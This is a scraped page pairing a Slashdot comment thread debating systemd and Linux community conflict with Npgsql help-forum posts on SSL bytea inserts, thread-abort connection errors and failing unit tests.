My car has a bunch of configuration options in the infotainment system. I can change all kinds of things: audio settings, HUD settings, navigation settings, etc. This doesn't make it hard to drive, because most peopl
Re: (Score:3).
It has also made ancient aliens take over the congress, caused otherwise normal peoplr to massacre entire cities, and cancer in everyone. finally, tiny little boils that explode annd throw white hot magma on everyone in cows. systemd is the real cause of all those millions of acres of wildfires in Washington state.
Now tell me. It is apparent that you hate systemd with a white hot passion.
so why are you using it? You do not haev to use it, and if you aren't. what on earth are you bitching bout. I mean r
Re:The Linux community is destroying itself. (Score:4, Insightful)
An appeal to ridicule is a logical fallacy: if it were an entertaining appeal to ridicule, it might be amusing, and I wouldn't expect pure logic on Slashdot. But please note that it doesn't address or even acknowledge a single one of the issues I mentioned. Many of those issues are architectural and core to systemd development.
And no, I don't "hate systemd with a white hot passion". It does a few things reasonably well, and there are some real benefits to getting faster boot times and kernel logging. The network integration is problematic, but shows some promise.
But systemd really needs to _stop_ trying to replace core system functions with yet another add-on module. And yes, it's trying to take on software packaging, as well.
Re: (Score:2)
An appeal to ridicule is a logical fallacy:
You assume I'm arguing with you. Use a distro with system d or do not.
However, just as annoyed as you get with my little bit of ridicule, imagine how annoying it is to not hear the word "Linux" without someone bitching about systemd.
If it is the unmitigated disaster some folks say it is, the problem will fix itself in short order.
Re: (Score:2)
And yes, it's trying to take on software packaging, as well.
FreeBSD user (and Mac OSX) here, so I've only followed the systemd meltdown from the periphery. Is that really true about systemd and packaging?
Re: (Score:2)
Apparently so. See... [0pointer.net] .
Re: (Score:2)
KDE doesn't depend on systemd. KDE runs on FreeBSD, which doesn't have systemd. KDE also runs on Windows.
Re: (Score:2)
> But udev doesn't depend on systemd, so your slippery slope is not very slippery.
It only has to be a little slippery, it's the steepness that lets people fall in. See the kdbus and similar components for the ongoing integration of udev with systemd.
Re: (Score:2).
None of that is really true. If you want syslog, just install syslog, and uninstall journald, systemd is modular, and you can pick and choose, you can even run syslog AND journald.
Similary the su ability is a new method you don't need to use. It is only a special case of new shell with a changed user that maintains all the most recent freedesktop variables.
Re: (Score:2)
> systemd's policy to drop them makes servers less secure
They have _replaced_, systlog with kernel resident binary logging utilities. This has advantages: you can generate monitoring from the kernel, itself, at boot time, before syslogd is running.
The big concern I've encountered is that systemd replaced stable, legible, parseable, well understood log output with t published but quite unique log format which no other tools in the world knew how to read. It wasn't necessary for enhancing init script mana
Re: The Linux community is destroying itself. (Score:2)
Please provide a link to a systemd document explaining their "policy to drop syslog messages".
On RH/Centos, systemd forwards to syslog by default, but systemctl status dhcpd (or similar) is very handy.
Re: (Score:3)
I call FUD.
Apparently systemd only consumes log messages by default. If you're looking for forensic analysis or troubleshooting, you can turn on forwarding to a normal syslog service like rsyslog or syslog-ng.
Re: (Score:2)
Examples of systemd breaking the kernel include the "debug" logging option, and the inevitable failures of such a complex weave of components killing PID 1.... [freedesktop.org] [ewontfix.com]
Unfortunately, "running syslogd in parallel" doesn't work well as new daemons or services are compiled for one or the other. And I'm afraid the code to integrate with systemd logging is a tar-baby: it
Re: (Score:2)
Well it is the community that just took the easy path and created a dependency on them.
Not really. Linux distros have long been divided into to major factions, the Red Hat faction and the Debian faction, plus some other sizeable mostly-unaligned groups (Slackware, Arch, Gentoo). These three factions still can't agree on even a package manager for some strange reason, even though it'd make things a lot easier to have this standardized. Debian is in no way dependent on RH. Ubuntu is dependent on Debian h
Re: (Score:2)
What distro features KDE5? I'm not aware of any.
If you're trying out alpha software, then I don't think it's at all fair to complain about issues like this. You can't expect a good out-of-the-box experience with something that isn't ready for prime-time.
All the KDE distros I know of are still using KDE4. Remember, they had this problem before: a bunch of distros switched to KDE4.0 way too soon (there's disagreement over whether the KDE team claimed it was ready for use or still in beta), and it was a dis
Re: (Score:2).
Go here: [distrowatch.com]
Then come back and blame this silly fake disaster on systemd.
Re: (Score:2)
I think you did not understand his point.
Re: (Score:2)
I think you did not understand his point.
What's "the Linux cummounity if not roll your own if you don't like it.
DIvision is exactly what linux is all about. If you don't like something, fork it. If the folks who start going apeshit the second systemd is mentioned were to fork it, instead of the incessent whining, they wouldnt have anything other than to brag about how superior their computig experience is, and eventually the distros with systemd would become mere footnotes, as it's ruinous qualities will just cause it to fail.
RIght?
Re: (Score:2)
still off topic
Re: (Score:3)
My theory
We saw this in Windows in 2006.
Vista scarred users soo much they freaking stuck with a 12 year old OS after Windows 7 cleansed all the messes of Vista. Some were happy to get Windows 7 and it had measurable marketshare from sites back on the RC days lol. The other half
... XP WORKS FINE!! CHANGE FOR THE SAKE OF CHANGE NA NA.. etc.
Well SystemD tried to be what Init failed to do on a modern system. Event driven Macbooks with startupD could sleep in one time zone and wake in another.
:-) Init can't d
Re:The Linux community is destroying itself. (Score:5, Insightful)
You, and people like you, exhibit the mentality and attitude that is responsible for the ongoing destruction of Linux.
Long time Linux users who use Linux for critical systems repeatedly describe the problems they've encountered with certain pieces of software, such as systemd and GNOME 3. Instead of listening to these users and trying to understand their problems, you and your ilk deny that these serious problems exist, and then attack these users for daring to mention these problems (by wrongly accusing them of "trolling", for example)..
We only need to look to Mozilla and Firefox to see what happens when users are treated like dirt. Firefox was once a very popular web browser, with well over 30% of the browser market. But then the Firefox developers stopped listening to what Firefox users wanted, and instead forced unwanted junk on Firefox's users. Even worse, the Firefox developers did not listen to the objections of Firefox's users to these unwanted changes. After several years of treating Firefox's users so poorly, we can see the awful results. Firefox is now under 10% of the market. The users who propelled Firefox to success have moved on to greener pastures, which even include modern versions of IE, as unbelievable as that may be. Now Firefox is seen as a joke browser, rather than the powerhouse that it once was, just a few years ago.
I sure hope that what we've seen happen to Firefox doesn't happen to Linux, but things aren't looking encouraging. There are just too many people like you, who are incapable of seeing the big picture, and more important, incapable of listening to the users of Linux. Not listening to these users and their concerns is perhaps the most harmful thing that can happen to Linux as a whole.
Re: (Score:2)
We only need to look to Mozilla and Firefox to see what happens when users are treated like dirt. Firefox was once a very popular web browser, with well over 30% of the browser market.
The problem with using that as an example is that Linux doesn't have 30% of the desktop PC market, it barely has more than 1%.
It never was popular to begin with.
Re:The Linux community is destroying itself. (Score:5, Insightful)
Long time Linux users who use Linux for critical systems...
Oh hey, that's me.
...repeatedly describe the problems they've encountered with certain pieces of software, such as systemd and GNOME 3.
Well, yeah. I'm a cranky old fart.
Instead of listening to these users and trying to understand their problems, you and your ilk deny that these serious problems exist...
Now wait just one Turing-completing minute there!
The problems aren't serious. They don't break my critical systems, because I'm not going to be deploying systemd into production until I've tested it thoroughly. My old init scripts will get a wrapper or a rewrite to fit the new OS as needed, but the software interface won't change very much at all. Now, if you want a serious problem, find a vulnerability in a basic system utility, like bash or OpenSSH. Those problems are already out in the wild, deployed to production systems. When a new one of those problems is found, there's a notable increase in the use of profanity around my desk.
A new startup system, or a new package format, or a new thing that does this thing different than how the old thing did that thing... none of those bother me. I'll wait, running my old-but-stable critical systems, until you short-tempered folks settle on exactly what you want to do. I'll then work around whatever issues remain, because that's my job. I'm a sysadmin.
Re: (Score:2)
No. It gives you license to want to murder the previous sysadmin who didn't bother to learn the system he was using.
On the other hand, if it's only "poorly-configured" because it doesn't conform to your standards, but does fit the design Ubuntu intends, then you have nobody to blame but yourself.
Re: (Score:3)
So how is that different from when the init script goes and fubars itself, or shits all over a log and you can't fix it? Or what about the kernel itself? What if your CPU is really a small explosive device, planted to sabotage your mission-critical systems? I guess you should go fire everyone who ever puts anything into mission-critical systems, because they might fail sometime.
I am not suggesting that critical failure is acceptable, but I do argue that the expertise, testing, and trust of a new system sho
Re: (Score:2).
You can really see this in Ubuntu and the Ubuntu Forums. Back a long time ago...
:) There were many active Ubuntu LoCos and knowledgeable people on Ubuntu Forums. Then the LoCo requirements got weird, and regions got arbitrarily changed. (Like Texas being one region since it was one state... Forget the fact that Dallas is closer to Chicago then El Paso.) And the LoCo community started to fall apart. Then Ubuntu Forums got hacked, and they went to the Ubuntu universal account that would not keep you lo
Re: (Score:2)
Re: (Score:2)
P.S. I assume you meant "tail | grep" not "grep | tail" !
"grep | tail" works better IMO
Re: (Score:3)
You have got to understand one thing : Linux is the playground of Red Hat. From top to bottom Red Hat does and the others follow or die. The idea that there is freedom in the open source movement is pure illusion. He who has control of the infrastructure components has control of linux. The other guys are just small fish. Even Ubuntu doesn't go anywhere without Debian, and Debian doesn't go anywhere without Red Hat.
Ironic that you post this in an article that is in no way about rpm...
:) I think it is more about developers that have become user unfocused. The "We know what they want more then they do" mentality. That never works well.
Re: (Score:3)
I think it is more about developers that have become user unfocused. The "We know what they want more then they do" mentality. That never works well.
It works quite well *if* you have a very good designer/innovator. Steve Jobs was arguably the best ever at building a product people didn't know they wanted until they saw his version of it.
The problem is that very few people are good at design, and most are really, really bad. When that happens we have to wait until market forces play out and the design fails.
Re: (Score:2, Troll)
You're why we don't have flying cars yet.
Oh don't be so dramatic. The real reason Linux is holding up flying cars is shitty drivers.
Re: (Score:2)
You're why we don't have flying cars yet.
Oh don't be so dramatic. The real reason Linux is holding up flying cars is shitty drivers.
If they would just share the API so we didn't need a flying car binary blob...
Re: (Score:2)
This whole systemd fiasco has caused a boatload of infighting, dissension among what should be cooperative members and teams, and it makes the process of administering Linux systems that much harder.
There is no need for a Microsoft conspirator to produce this outcome. The linux community, filled by zealots who *believe* in "Right Things" is completely responsible for its fate. Any change to core components will result in a mess.
Extremely good changes will cause little problems (only some whining) ; reasonably good changes with little drawbacks will cause havoc. And instead of working together with authors to improve shortcomings, they will just waste their time (as well as the time of the authors) to
Re:My theory (Score:5, Interesting)
Can someone explain to me why an article on a serious change in Ubuntu that has zilch to do with systemd has been hijacked by the systemdaphobes?
Unlike systemd, this change actually appears to have significant negative repercussions, not "I'm not actually an old system admin but I pretend to be on Slashdot because I hated pulseaudio and by god I'm not going to let the author of that replace a crusty, unreliable, set of shell scripts and get away with it" type "trying to find excuses to bash it" type stuff, as we see with systemd, but real concerns about cross-distro compatibility, and change-for-change's sake.
So it'd be nice to have a discussion about it.
These seems to be a theme on Slashdot lately. People want to hijack barely related threads to discuss something that makes them hot under the collar. And, perhaps not surprisingly given the mentality needed to hijack unrelated discussions, it seems that the views they express are generally trollish and slimy.
Can you let us discuss Snappy? Please? It sounds like it has serious ramifications to me. Tell you what, if you STFU, I won't troll - and encourage other Ubuntu users to troll - the next systemd article. Deal?
Re: (Score:2)
Microsoft didn't shun back from destroying the then largest mobile phone vendor, Nokia.
Nokia destroyed itself by trucking on with crusty Symbian for too long. The Microsoft deal happened long time after that. | https://news.slashdot.org/story/15/09/06/196249/shuttleworth-says-snappy-wont-replace-deb-linux-package-files-in-ubuntu-1510 | CC-MAIN-2017-17 | en | refinedweb |
JavaScript Testing: Unit vs Functional vs Integration TestsBy Eric Elliott
More from this author.
Here are some simple unit test examples from real projects using Tape:
// Ensure that the initial state of the "hello" reducer gets set correctly import test from 'tape'; import hello from 'store/reducers/hello'; test('...initial', assert => { const message = `should set { mode: 'display', subject: 'world' }`; const expected = { mode: 'display', subject: 'World' }; const actual = hello(); assert.deepEqual(actual, expected, message); assert.end(); });
// Asynchronous test to ensure that a password hash is created as expected. import test from 'tape', import credential from '../credential'; test('hash', function (t) { // Create a password record const pw = credential(); // Asynchronously create the password hash pw.hash('foo', function (err, hash) { t.error(err, 'should not throw an error'); t.ok(JSON.parse(hash).hash, 'should be a json string representing the hash.'); t.end(); }); });
Integration Tests
Integration tests ensure that various units work together correctly. For example, a Node route handler might take a logger as a dependency. An integration test might hit that route and test that the connection was properly logged.
In this case, we have two units under test:
- The route handler
- The logger
If we were unit testing the logger, our tests wouldn’t invoke the route handler, or know anything about it.
If we were unit testing the route handler, our tests would stub the logger, and ignore the interactions with it, testing only whether or not the route responded appropriately to the faked request.
Let’s look at this in more depth. The route handler is a factory function which uses dependency injection to inject the logger into the route handler. Let’s look at the signature (See the rtype docs for help reading signatures):
createRoute({ logger: LoggerInstance }) => RouteHandler
Let’s see how we can test this:
import test from 'tape'; import createLog from 'shared/logger'; import routeRoute from 'routes/my-route'; test('logger/route integration', assert => { const msg = 'Logger logs router calls to memory'; const logMsg = 'hello'; const url = `{ logMsg }`; const logger = createLog({ output: 'memory' }); const routeHandler = createRoute({ logger }); routeHandler({ url }); const actual = logger.memoryLog[0]; const expected = logMsg; assert.equal(actual, expected, msg); assert.end(); });
We’ll walk through the important bits in more detail. First, we create the logger and tell it to log in memory:
const logger = createLog({ output: 'memory' });
Create the router and pass in the logger dependency. This is how the router accesses the logger API. Note that in your unit tests, you can stub the logger and test the route in isolation:
const routeHandler = createRoute({ logger });
Call the route handler with a fake request object to test the logging:
routeHandler({ url });
The logger should respond by adding the message to the in-memory log. All we need to do now is check to see if the message is there:
const actual = logger.memoryLog[0];
Similarly, for APIs that write to a database, you can connect to the database and check to see if the data is updated correctly, etc…
Many integration tests test interactions with services, such as 3rd party APIs, and may need to hit the network in order to work. For this reason, integration tests should always be kept separate from unit tests, in order to keep the unit tests running as quickly as they can.
Functional Tests
Functional tests are automated tests which ensure that your application does what it’s supposed to do from the point of view of the user. Functional tests feed input to the user interface, and make assertions about the output that ensure that the software responds the way it should.
Functional tests are sometimes called end-to-end tests because they test the entire application, and it’s hardware and networking infrastructure, from the front end UI to the back end database systems. In that sense, functional tests are also a form of integration testing, ensuring that machines and component collaborations are working as expected.
Functional tests typically have thorough tests for “happy paths” — ensuring the critical app capabilities, such as user logins, signups, purchase work flows, and all the critical user workflows all behave as expected.
Functional tests should be able to run in the cloud on services such as Sauce Labs, which typically use the WebDriver API via projects like Selenium.
That takes a bit of juggling. Luckily, there are some great open source projects that make it fairly easy.
My favorite is Nightwatch.js. Here’s what a simple Nightwatch functional test suite looks like this example from the Nightwatch docs:
module.exports = { 'Demo test Google' : function (browser) { browser .url('') .waitForElementVisible('body', 1000) .setValue('input[type=text]', 'nightwatch') .waitForElementVisible('button[name=btnG]', 1000) .click('button[name=btnG]') .pause(1000) .assert.containsText('#main', 'Night Watch') .end(); } };
As you can see, functional tests hit real URLs, both in staging environments, and in production. They work by simulating actions the end user might take in order to accomplish their goals in your app. They can click buttons, input text, wait for things to happen on the page, and make assertions by looking at the actual UI output.
Smoke Tests
After you deploy a new release to production, it’s important to find out right away whether or not it’s working as expected in the production environment. You don’t want your users to find the bugs before you do — it could chase them away!
It’s important to maintain a suite of automated functional tests that act like smoke tests for your newly deployed releases. Test all the critical functionality in your app: The stuff that most users will encounter in a typical session.
Smoke tests are not the only use for functional tests, but in my opinion, they’re the most valuable.
What Is Continuous Delivery?
Prior to the continuous delivery revolution, software was released using a waterfall process. Software would go through the following steps, one at a time. Each step had to be completed before moving on to the next:
- Requirement gathering
- Design
- Implementation
- Verification
- Deployment
- Maintenance
It’s called waterfall because if you chart it with time running from right to left, it looks like a waterfall cascading from one task to the next. In other words, in theory, you can’t really do these things concurrently.
In theory. In reality, a lot of project scope is discovered as the project is being developed, and scope creep often leads to disastrous project delays and rework. Inevitably, the business team will also want “simple changes” made after delivery without going through the whole expensive, time-consuming waterfall process again, which frequently results in an endless cycle of change management meetings and production hot fixes.
A clean waterfall process is probably a myth. I’ve had a long career and consulted with hundreds of companies, and I’ve never seen the theoretical waterfall work the way it’s supposed to in real life. Typical waterfall release cycles can take months or years.
The Continuous Delivery Solution
Continuous delivery is a development methodology that acknowledges that scope is uncovered as the project progresses, and encourages incremental improvements to software in short cycles that ensure that software can be released at any time without causing problems.
With continuous delivery, changes can ship safely in a matter of hours.
In contrast to the waterfall method, I’ve seen the continuous delivery process running smoothly at dozens of organizations — but I’ve never seen it work anywhere without a quality array of test suites that includes both unit tests and functional tests, and frequently includes integration tests, as well.
Hopefully now you have everything you need to get started on your continuous delivery foundations.
Conclusion
As you can see, each type of test has an important part to play. Unit tests for fast developer feedback, integration tests to cover all the corner cases of component integrations, and functional tests to make sure everything works right for the end users.
How do you use automated tests in your code, and how does it impact your confidence and productivity? Let me know in the comments.
- Andrés Gallego
- Dan Prince
- Eric Elliott
- Dan Prince
- Eric Elliott
- Toño Alvarez
- David Larbee
- Eric Elliott
- markbrown4
- Eric Elliott
- markbrown4
- Eric Elliott
- Tracker1
- joe3487
- Eric Elliott
- joe3487
- Chairat Onyaem
- Chet Harrison
- Georgios Dyrrachitis
- Deepak
- M S i N Lund
- Eric Elliott
- Chyngyz Arystan
- Bob Jones
- davypeterbraun
- Maximus Koretskyi
- Dave
- Vitalik Zaidman
- Go JS! | https://www.sitepoint.com/javascript-testing-unit-functional-integration/?utm_source=javascriptweekly&utm_medium=email | CC-MAIN-2017-17 | en | refinedweb |
On Sun, Sep 27, 2009 at 07:39:04PM +0100, Russell King - ARM Linux wrote:> On Sun, Sep 27, 2009 at 08:27:07PM +0200, Sam Ravnborg wrote:> > On Sun, Sep 27, 2009 at 05:41:16PM +0100, Russell King - ARM Linux wrote:> > > Sam,> > > > > > Any idea how to solve this:> > > > > > WARNING: arch/arm/kernel/built-in.o(.text+0x1ebc): Section mismatch in reference from the function cpu_idle() to the function .cpuexit.text:cpu_die()> > > The function cpu_idle() references a function in an exit section.> > > Often the function cpu_die() has valid usage outside the exit section> > > and the fix is to remove the __cpuexit annotation of cpu_die.> > > > > > WARNING: arch/arm/kernel/built-in.o(.cpuexit.text+0x3c): Section mismatch in reference from the function cpu_die() to the function .cpuinit.text:secondary_start_kernel()> > > The function __cpuexit cpu_die() references> > > a function __cpuinit secondary_start_kernel().> > > This is often seen when error handling in the exit function> > > uses functionality in the init path.> > > The fix is often to remove the __cpuinit annotation of> > > secondary_start_kernel() so it may be used outside an init section.> > > > > > Logically, the annotations are correct - in the first case, cpu_die()> > > will only ever be called if hotplug CPU is enabled, since you can't> > > offline a CPU without hotplug CPU enabled. In that case, the __cpuexit.*> > > sections are not discarded.> > > > The annotation of cpu_die() is wrong.> > To be annotated __cpuexit the function shall:> > - be used in exit context and only in exit context with HOTPLUG_CPU=n> > - be used outside exit context with HOTPLUG_CPU=y> > > > cpu_die() fails on the first condition because it is only used> > if HOTPLUG_CPU=y.> > The annotation is wrongly used as a replacement for an ifdef.> > As cpu_die() is already inside ifdef CONFIG_HOTPLUG_CPU is should> > be enough to just remove the annotation.> > > > Like this (copy'n'paste so it does not apply)> > > > diff --git a/arch/arm/kernel/smp.c b/arch/arm/kernel/smp.c> > index e0d3277..de4ef1c 100644> > --- a/arch/arm/kernel/smp.c> > +++ b/arch/arm/kernel/smp.c> > @@ -214,7 +214,7 @@ void __cpuexit __cpu_die(unsigned int cpu)> > * of the other hotplug-cpu capable cores, so presumably coming> > * out of idle fixes this.> > */> > -void __cpuexit cpu_die(void)> > +void cpu_die(void)> > {> > unsigned int cpu = smp_processor_id();> > This is wrong. cpu_die() does not need to exist if hotplug CPU is> disabled. In that case, it should be discarded and this is precisely> what __cpuexit does. The annotation is, therefore, correct.From arch/arm/kernel/smp.c#ifdef CONFIG_HOTPLUG_CPU...void __cpuexit cpu_die(void){ unsigned int cpu = smp_processor_id(); local_irq_disable(); idle_task_exit(); /* * actual CPU shutdown procedure is at least platform (if not * CPU) specific */ platform_cpu_die(cpu); /* * Do not return to the idle loop - jump back to the secondary * cpu initialisation. There's some initialisation which needs * to be repeated to undo the effects of taking the CPU offline. */ __asm__("mov sp, %0\n" " b secondary_start_kernel" : : "r" (task_stack_page(current) + THREAD_SIZE - 8));}#endif /* CONFIG_HOTPLUG_CPU */Please look at the above and realise that cpu_die() is only ever definedin case that HOTPLUG_CPU is defined. So there is nothing to discard ifHOTPLUG_CPU equals to n.And just to repeat myself....The only correct use of __cpu* annotation is for function/data that isused with or without HOTPLUG_CPU equals to y.Which is NOT the case for cpu_die().The __cpu* annotation is not a replacement for ifdeffed out code that isnot relevant for the non-HOTPLUG_CPU case. Sam | http://lkml.org/lkml/2009/9/27/142 | CC-MAIN-2017-17 | en | refinedweb |
This forum
Forum: help
Monitor Forum
|
Start New Thread
Nested
Flat
Threaded
Ultimate
Show 25
Show 50
Show 75
Show 100
SSL, DataTables, and bytea transfers
[ reply ]
By:
Dan Sherwin
on 2008-01-15 02:38
[forum:1003022]
Im utilizing Npgsql 1.0.0, and I have a simple table with 3 cols. 2 text fields, and one bytea. When I insert a row into my DataTable, with a bytea field size of say 35K, using an SSL connection, and I call the DataAdapter.Update method on the DataTable, the new row does not get added to the table. Log output shows no errors and nothing out of the ordinary. Postgres log doesnt seem to even see the insert statement. If perform the exact same procedure without using an SSL connection, everything works fine. If I just have a couple of bytes in the bytea field, using SSL, everything works fine. Oh, and the NpgsqlCommand.Prepare has no effect one way or the other. I am using PostGres 8.1.4 on a FreeBSD machine. Any ideas? I will post some sample code if needed. Figured my explanation may be enough for someone to recognize it.
Thanks in advance.
RE: SSL, DataTables, and bytea transfers
[ reply ]
By:
Francisco Figueiredo jr.
on 2008-01-15 20:23
[forum:1003024]
We had a lot of problems with transfer being stuck with ssl enable. Can you try to get a newer Mono.Security.dll assembly from Mono project and give it a try?
You can get newer assemblies from
You must get Mono.Security.dll assemblies for .net 1.1
I hope it helps.
Specified Method Not Supported?
[ reply ]
By:
Joe Bagodonuts
on 2008-01-10 20:22
[forum:1003008]
Hey, people -
I'm using the 2.0 Beta version of npgsql in a C#.Net app. I'm able to load the reference and see it in the Object Browser (even though I was unable to add it to the GAC -- "Failure adding assembly to the cache: Unknown Error" -- but that's another thread). I successfully connect to my test database, but when I try to list the tables using NpgsqlConnection.getSchema(collection) I get the Method Not Supported exception. getSchema() works fine with NO args, but I'm not getting what I want from that. Has anyone seen this and, if so, can you tell me a way to get past it? My thanks in advance...
Broken Connections
[ reply ]
By:
Andreas Schönebeck
on 2008-01-09 10:38
[forum:1002997]
Hello from Berlin!
I'm running into trouble calling Thread.Abort() on a thread that is doing a NpgqslCommand.ExecuteReader(). The command and connection is created in the thread itself. Also there is only one Connection open at a time, because the main thread is waiting for completion using Thread.Join().
To illustrate the problem I've written a test to create 10 threads, which are aborted after a short random time (100-1000 ms) and a final thread, which is never aborted and should run cleanly to the end.
As you can see by the test's output there are various exceptions generated by the aborted threads and only sometimes the ThreadAbortException gets cleanly caught.
Which is weirdest is, that after the 10'th aborted thread catches a clean ThreadAbortException ("[9] Thread aborted.") the final thread, which should run till the end and read ~50000 records does throw an exception in ExecuteReader()!?!
In application context (user pressing "refresh" very quickly, high server load) the last database read will sometimes not return any results.
What can I do to improve stability? I hope, the test case code is giving an idea of my problem and someone has a quick and proper fix.
Maybe I found a bug in Npgsql and ThreadAbortExceptions are not handled properly and connections end up in corrupted state, but are reused by pooling?
Thanks for looking into this,
Andreas Schönebeck
// Output
[Main] Starting Thread [0].
[Main] Aborting Thread [0].
[Main] Waiting for Thread [0] to finish.
[0] Unhandled exception caught (System.NotSupportedException): Dieser Stream unterstützt keine Suchvorgänge.
[Main] Starting Thread [1].
[Main] Aborting Thread [1].
[Main] Waiting for Thread [1] to finish.
[1] Unhandled exception caught (System.NotSupportedException): Backend sent unrecognized response type:
[Main] Starting Thread [2].
[Main] Aborting Thread [2].
[Main] Waiting for Thread [2] to finish.
[2] Unhandled exception caught (System.NotSupportedException): Backend sent unrecognized response type:
[Main] Starting Thread [3].
[Main] Aborting Thread [3].
[3] Unhandled exception caught (System.NotSupportedException): Dieser Stream unterstützt keine Suchvorgänge.
[Main] Waiting for Thread [3] to finish.
[Main] Starting Thread [4].
[Main] Aborting Thread [4].
[4] Unhandled exception caught (System.NotSupportedException): Dieser Stream unterstützt keine Suchvorgänge.
[Main] Waiting for Thread [4] to finish.
[Main] Starting Thread [5].
[Main] Aborting Thread [5].
[5] Unhandled exception caught (System.NotSupportedException): Dieser Stream unterstützt keine Suchvorgänge.
[Main] Waiting for Thread [5] to finish.
[Main] Starting Thread [6].
[Main] Aborting Thread [6].
[6] Unhandled exception caught (System.NotSupportedException): Dieser Stream unterstützt keine Suchvorgänge.
[Main] Waiting for Thread [6] to finish.
[Main] Starting Thread [7].
[Main] Aborting Thread [7].
[7] Unhandled exception caught (System.NotSupportedException): Dieser Stream unterstützt keine Suchvorgänge.
[Main] Waiting for Thread [7] to finish.
[Main] Starting Thread [8].
[Main] Aborting Thread [8].
[8] Unhandled exception caught (System.NotSupportedException): Dieser Stream unterstützt keine Suchvorgänge.
[Main] Waiting for Thread [8] to finish.
[Main] Starting Thread [9].
[Main] Aborting Thread [9].
[Main] Waiting for Thread [9] to finish.
[9] Thread aborted.
[Main] Starting Thread [10].
[10] Unhandled exception caught (System.NotSupportedException): Dieser Streamunterstützt keine Suchvorgänge.
[Main] Waiting for Thread [10] to finish.
Press any key to continue . . .
// Source...
sing System;
using System.Threading;
using Npgsql;
class Program
{
public static void Main(string[] args)
{
RunTestAbort(0);
RunTestAbort(1);
RunTestAbort(2);
Console.Write("Press any key to continue . . . ");
Console.ReadKey(true);
}
public static void RunTestAbort(int id)
{
Thread dbthread = new Thread(AbortThreadFunc);
Console.WriteLine("[Main] Starting Thread [{0}].", id);
dbthread.Start(id);
Thread.Sleep(150);
Console.WriteLine("[Main] Aborting Thread [{0}].", id);
dbthread.Abort();
Console.WriteLine("[Main] Waiting for Thread [{0}] to finish.", id);
dbthread.Join();
}
public static void AbortThreadFunc(object parameter)
{
int id = (int)parameter;";
using(NpgsqlDataReader sdr = cmd.ExecuteReader()) {
int recordcount = 0;
while (sdr.Read()) {
recordcount++;
}
Console.WriteLine("[{0}] Successfully read {1} records.", id, recordcount);
}
}
}
} catch (ThreadAbortException ex) {
Console.WriteLine("[{0}] Thread aborted.", id, ex.StackTrace);
} catch (Exception ex) {
Console.WriteLine("[{0}] Unhandled exception caught ({1}): {2}", id, ex.GetType().ToString(), ex.Message);
}
}
}
Unplugging network causes null reference ex
[ reply ]
By:
Alex Simmens
on 2008-01-03 17:59
[forum:1002973]
Hi, i've been experimenting with the NPGSQL2.0 beta 2 driver and i noticed a possible bug.
I have created 3 connections to a postgres db with the same connection string, and if i unplug my network cable and try an execute reader command such as SELECT * FROM queues WHERE queueno = 1; on one of the connections, after the command times out, i get an unhandled null reference exception in the NpgsqlConnectorPool.TimerElapsed Handler
on investigation, i found it to be caused by the queue object on this line being null:- (Queue.Count > 0)
i tried fixing it by adding a if (Queue != null) check before it and it seems to work, but as i don't understand how npgsql works and i don't know C# very well i may be being silly
hope it helps
alex
RE: Unplugging network causes null reference ex
[ reply ]
By:
Alex Simmens
on 2008-01-03 18:13
[forum:1002974]
Just to give some more info, im running my app. in VS2005 on WinXP and the postgres server in on the local area network
multiple threads with independent connections
[ reply ]
By:
Carl Strange
on 2008-01-02 16:47
[forum:1002966]
I'm starting work on a personal project to gather data from various web sites. I'm relatively comfortable in C# and with SQL but this will be my first use of Npgsql and PostgreSQL.
My initial design has several web scrapers, running in separate threads, each with their own database connection. They simply post data to various tables so I shouldn't have interlock problems between threads. The main thread will periodically read the database to check on the worker's progress.
I understand a single database connection is not thread safe but are there any problems with independent connections on independent threads?
Regards,
Carl
RE: multiple threads with independent connections
[ reply ]
By:
Francisco Figueiredo jr.
on 2008-01-02 17:24
[forum:1002967]
Hi, Carl!
No, there is no problem. Indeed this is the right way of using it, a connection per thread. We had some issues in past with multithread but now they are fixed.
Let us know if you have any problems with it.
Thanks for your interest in Npgsql!
RE: multiple threads with independent connect
[ reply ]
By:
Carl Strange
on 2008-01-02 18:16
[forum:1002968]
Francisco,
Thanks for your speedy response. If I run into any problems I'll certainly ask questions. Meanwhile it's nice to know I'm on the right track.
Carl
I got 8 testcases failed.
[ reply ]
By:
Tao Wang
on 2007-11-30 08:20
[forum:1002893]
Every time I run the testcase, I got 8 testcases failed. After I digged into, it looks like some testcases are wrong. The following is the test result:
------ Test started: Assembly: NpgsqlTests.dll ------
TestCase 'NpgsqlTests.CommandTests.DateTimeSupportTimezone'
failed:
String lengths are both 20. Strings differ at index 11.
Expected: "2002-02-02 16:00:23Z"
But was: "2002-02-02 09:00:23Z"
----------------------^
F:\dev\Npgsql2\testsuite\noninteractive\NUnit20\CommandTests.cs(941,0): at NpgsqlTests.CommandTests.DateTimeSupportTimezone()
TestCase 'NpgsqlTests.CommandTests.DateTimeSupportTimezone2'
failed:
Expected string length 20 but was 16. Strings differ at index 5.
Expected: "2002-02-02 16:00:23Z"
But was: "2002-2-2 9:00:23"
----------------^
F:\dev\Npgsql2\testsuite\noninteractive\NUnit20\CommandTests.cs(951,0): at NpgsqlTests.CommandTests.DateTimeSupportTimezone2()
TestCase 'NpgsqlTests.CommandTests.FunctionReturnVoid'
failed: Npgsql.NpgsqlException : ERROR: 42883: function test(integer)(463,0): at Npgsql.NpgsqlCommand.ExecuteNonQuery()
F:\dev\Npgsql2\testsuite\noninteractive\NUnit20\CommandTests.cs(651,0): at NpgsqlTests.CommandTests.FunctionReturnVoid()
TestCase 'NpgsqlTests.CommandTests.LastInsertedOidSupport'
failed: Npgsql.NpgsqlException : ERROR: 42703: column "oid"(706,0): at Npgsql.NpgsqlCommand.ExecuteScalar()
F:\dev\Npgsql2\testsuite\noninteractive\NUnit20\CommandTests.cs(1969,0): at NpgsqlTests.CommandTests.LastInsertedOidSupport()
TestCase 'NpgsqlTests.CommandTests.ListenNotifySupport' failed: System.InvalidOperationException was expected
TestCase 'NpgsqlTests.CommandTests.ParametersGetName'
failed:
Expected string length 10 but was 11. Strings differ at index 0.
Expected: "Parameter4"
But was: ":Parameter4"
-----------^
F:\dev\Npgsql2\testsuite\noninteractive\NUnit20\CommandTests.cs(73,0): at NpgsqlTests.CommandTests.ParametersGetName()
TestCase 'NpgsqlTests.DataAdapterTests.UpdateWithDataSet'
failed: System.InvalidOperationException : Dynamic SQL generation for the UpdateCommand is not supported against a SelectCommand that does not return any key column information
at System.Data.Common.DbDataAdapter.UpdatingRowStatusErrors(RowUpdatingEventArgs rowUpdatedEvent, DataRow dataRow)(DataSet dataSet, String srcTable)
at System.Data.Common.DbDataAdapter.Update(DataSet dataSet)
